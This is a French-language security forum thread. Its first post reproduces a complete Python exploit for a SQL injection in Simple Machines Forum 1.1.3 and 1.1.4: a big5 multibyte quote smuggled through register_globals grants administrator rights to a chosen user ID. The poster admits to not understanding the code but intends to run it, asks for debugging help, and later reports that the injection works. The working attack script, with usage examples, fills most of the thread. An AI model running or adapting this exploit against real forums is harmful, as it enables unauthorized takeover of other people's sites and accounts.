SMF 1.1.4 Remote SQL

Moderator: Mod

SMF 1.1.4 Remote SQL

Postby BLINGZ » Sun Sep 28, 2008 7:26 pm

[code:1:c4c39a36e4]
Simple Machines Forum <= 1.1.4 Remote SQL Injection Exploit

#!/usr/bin/python
"""
#=================================================================================================#
# ____ __________ __ ____ __ #
# /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ #
# | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ #
# | | | \ | |/ \ \___| | /_____/ | || | #
# |___|___| /\__| /______ /\___ >__| |___||__| #
# \/\______| \/ \/ #
#=================================================================================================#
# This was a priv8 Exploit #
#=================================================================================================#
# Simple Machines Forum <= 1.1.4 #
# Sql Injection Vulnerability #
# Priviledge Escalation Exploit #
#====================================#===========#====================================#===========#
# Server Configuration Requirements # # Some Information # #
#====================================# #====================================# #
# # #
# register_globals = 1 # Vendor: www.simplemachines.org #
# # Author: The:Paradox #
#================================================# Severity: N/A #
# # #
# You may find exploits updates and more # #
# explanations on => # Proud To Be Italian. #
# http://paradox.altervista.org # #
# # #
#====================================#===========#================================================#
# Board Description # #
#====================================# #
# #
# Simple Machines Forum - SMF in short - is a free, professional grade software package that #
# allows you to set up your own online community within minutes. #
# Its powerful custom made template engine puts you in full control of the lay-out of your #
# message board and with our unique SSI - or Server Side Includes - function you can let your #
# forum and your website interact with each other. #
# SMF is written in the popular language PHP and uses a MySQL database. It is designed to provide #
# you with all the features you need from a bulletin board while having an absolute minimal #
# impact on the resources of the server. #
# SMF is the next generation of forum software - and best of all it is and will always #
# remain completely free! #
# #
#====================================#============================================================#
# Proof Of Concept / Bug Explanation # #
#====================================# #
# This is a quite old exploit and it is inapplicable on 1.1.5 version and on last 2.0 pre-release #
# (that's why I decided to public it). First, let's have a little poc. #
#=================================================================================================#

[Load.php]

148. if (isset($db_character_set) && preg_match('~^\w+$~', $db_character_set) === 1)
149. db_query("
150. SET NAMES $db_character_set", __FILE__, __LINE__);


#=================================================================================================#
# In Load.php if $db_character_set is set Smf will execute a Set Names Sql Query. #
# Directly from dev.mysql.com let's see what it means. #
# #
# "SET NAMES indicates what character set the client will use to send SQL statements to the #
# the server. Thus, SET NAMES 'cp1251' tells the server future incoming messages from this client #
# are in character set cp1251." #
# #
# Ok, now let's see what $db_character_set is. #
# $db_character_set is a "Settings.php variable" written only if a "Non-Default tick" #
# is checked during the installation process. #
# The real vulnerability is when the "Non-Default tick" is left unchecked, Smf doesn't write #
# it in "Settings.php" and no value is assigned to it: it's possible to set it #
# via register_globals. #
# #
# Now the cool poc section =D #
# Surely you saw that preg_match avoids any injection of non-alphanumerical chars in the query #
# at line 150 in Load.php #
# So, how is possible to take advantage of that? #
# To understand this vulnerability you have to comprehend some character set presents multibyte #
# characters and they may obiate addslashes() function. #
# Addslashes simply adds a backslash (0x5c) before single quote ('), double quote ("), #
# backslash (\) and NUL (the NULL byte), without checking if the added blackslash creates #
# another char. #
# No, i'm not going mad :P Here is an example: #
# #
# Bytes in Input #
# 0xa327 #
# #
# Addslashes(Bytes in Input) #
# 0xa35c27 #
# #
# In big5, but also in other multibyte charsets, 0xa35c is a valid char: 0x27 (') is left alone. #
# Therefore a lot of smf's queries are vulnerable if $db_character_set is settable. #
# In this exploit i will inject sql code in Update syntax, increasing user's privledges. #
#=================================================================================================#
# Exploit tested on 1.1.3 and 1.1.4 Smf's versions. #
#=================================================================================================#
# Use this exploit at your own risk. You are responsible for your own deeds. #
#=================================================================================================#
# Python Exploit Starts #
#=================================================================================================#
"""
from sys import argv, exit
from httplib import HTTPConnection
from urllib import urlencode, unquote
from time import sleep
print """
#=================================================================#
# Simple Machines Forum <= 1.1.4 #
# Sql Injection Vulnerability #
# Priviledge Escalation Exploit #
# #
# ###################################### #
# # Let's get administrator rights!!! # #
# ###################################### #
# #
# Discovered By The:Paradox #
# #
# Usage: #
# ./Exploit [Target] [Path] [PHPSessID] [Userid] #
# #
# Example: #
# ./Exploit 127.0.0.1 /SMF/ a574bfe34d95074dea69c00e38851722 9 #
# ./Exploit www.host.com / 11efb3b6031bc79a8dd7526750c42119 36 #
#=================================================================#
"""

if len(argv)<=4: exit()


sn = "PHPSESSID" # Session cookie name. You may have to change this.
port = 80

target = argv[1]
path = argv[2]
sv = argv[3]
uid = argv[4]


class killsmf:

def __init__(self):

print "[.] Exploit Starts."

self.GetSesc()
self.CreateLabels()
self.Inject()

print "[+] All done.\n Now user with ID_MEMBER " + uid + " should have administrator rights. \n -= Paradox Got This One =-"

def GetSesc(self):

print "[+] Trying to read Sesc"

for i in range (0,2):
conn = HTTPConnection(target,port)
conn.request("GET", path + "index.php?action=pm;sa=manlabels;", {}, {"Accept": "text/plain","Cookie": sn + "=" + sv + ";"})
rsp = conn.getresponse()
r = rsp.read()

if rsp.status == 404:
exit ("[-] Error 404. Not Found")
elif r.find('<input type="hidden" name="sc" value="') != -1 and r.find('" />') != -1 :
self.sesc = r.split('<input type="hidden" name="sc" value="')[1].split('" />')[0]
if len(self.sesc) != 32: exit ("[-] Invalid Sesc")
print "[+] Sesc has been successfully read ==> "+self.sesc
else:
exit ("[-] Unable to find Sesc")

def CreateLabels(self):
print "[+] Creating three labels..."
for i in range (0,3):
conn = HTTPConnection(target,port)
conn.request("POST", path + "index.php?action=pm;sa=manlabels;sesc="+self.sesc, urlencode({"label" : i, "add" : "Add+New+Label"}), {"Accept": "text/plain","Content-type": "application/x-www-form-urlencoded","Referer": "http://" + target + path + "/index.php?action=pm;sa=manlabels", "Cookie": sn + "=" + sv + ";"})
sleep(0.35)
def Inject(self):
print "[+] Sql code is going to be injected."
conn = HTTPConnection(target,port)
conn.request("POST", path + "index.php?debug;action=pm;sa=manlabels;sesc="+self.sesc, urlencode({"label_name[0]" : "o rly" + unquote("%a3%27"),"label_name[1]" : "ID_GROUP=1 WHERE/*", "label_name[2]" : "*/ID_MEMBER=" + uid + "/*", "save" : "Save", "sc" : self.sesc, "db_character_set": "big5"}), {"Accept": "text/plain","Content-type": "application/x-www-form-urlencoded","Referer": "http://" + target + path + "/index.php?action=pm;sa=manlabels", "Cookie": sn + "=" + sv + ";"})

killsmf()

# milw0rm.com [2008-06-15]
[/code:1:c4c39a36e4]

Ben moi j'ai quelques soucis avec... Vous me direz go apprendre Python noob et stop utiliser des choses que tu ne comprends pas. Donc oui j'apprend python mais je galère pour faire des petits jeux à la con donc je ne suis pas en mesure de comprendre entierement ce code. Après c'est pas ça qui va m'empêcher d'essayer de l'employer =)
Bref voilà ce que j'ai à l'execution:

[quote:c4c39a36e4][.] Exploit Starts.
[+] Trying to read Sesc
Traceback (most recent call last):
File "C:\Documents and Settings\Bling\Bureau\exploit.py", line 179, in <module
>
killsmf()
File "C:\Documents and Settings\Bling\Bureau\exploit.py", line 143, in __init_
_
self.GetSesc()
File "C:\Documents and Settings\Bling\Bureau\exploit.py", line 155, in GetSesc

conn.request("GET", path + "index.php?action=pm;sa=manlabels;", {}, {"Accept
": "text/plain","Cookie": sn + "=" + sv + ";"})
File "C:\Python25\lib\httplib.py", line 866, in request
self._send_request(method, url, body, headers)
File "C:\Python25\lib\httplib.py", line 889, in _send_request
self.endheaders()
File "C:\Python25\lib\httplib.py", line 860, in endheaders
self._send_output()
File "C:\Python25\lib\httplib.py", line 732, in _send_output
self.send(msg)
File "C:\Python25\lib\httplib.py", line 699, in send
self.connect()
File "C:\Python25\lib\httplib.py", line 667, in connect
socket.SOCK_STREAM):
socket.gaierror: (11001, 'getaddrinfo failed')[/quote:c4c39a36e4]

Bref j'ai google un peu et ce serait une histoire d'host qu'il ne trouve pas (je crois) mais bon voilà je peux rien faire de plus pour le moment si ce n'est retourner à mes petits jeux donc si quelqu'un peut m'aiguiller un peu ce serait cool.
Merci
BLINGZ
Projets
 
Posts: 4
Joined: Sun Sep 28, 2008 7:14 pm

Postby BLINGZ » Mon Sep 29, 2008 12:51 am

Fonctionne bien sur 1.1.3 mais sur 1.1.4 j'arrive pas.... Je situe pas le problème :/
Marche sur 1.1.4 aussi finalement... Enfin ça injecte et tout et tout mais j'arrive pas à me connecter avec les droits x).
BLINGZ
Projets
 
Posts: 4
Joined: Sun Sep 28, 2008 7:14 pm


Return to Sécurité Intrusion

Who is online

Users browsing this forum: No registered users and 1 guest

cron